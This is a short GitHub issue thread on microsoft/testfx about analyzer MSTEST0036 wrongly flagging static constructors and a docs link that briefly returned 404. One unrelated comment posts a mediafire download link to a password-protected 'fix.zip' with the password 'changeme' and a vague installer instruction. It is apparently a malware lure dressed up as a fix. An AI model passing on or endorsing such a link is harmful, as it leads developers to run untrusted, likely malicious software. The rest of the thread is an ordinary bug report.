### ISSUE TITLE
MSTest0036 should not give warnings for static constructors

### ISSUE THREAD

**Issue by drognanar** [microsoft/testfx#3709]
When compiling a class where both base class and itself have both a static constructor the following diagnostic gets reported:

```
Class.cs(19,18): error MSTEST0036: Member '.cctor' is already exist in the base class (https://learn.microsoft.com/dotnet/core/testing/mstest-analyzers/mstest0036) [MyProject.csproj]
```

Also, the MS docs page when opening the URL reported by the compiler returns a 404 page.

Expected:
Adding static constructors does not report the diagnostic.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by drognanar** [comment]
I can see it now. perhaps it just got online, since the docs PR got merged in yesterday
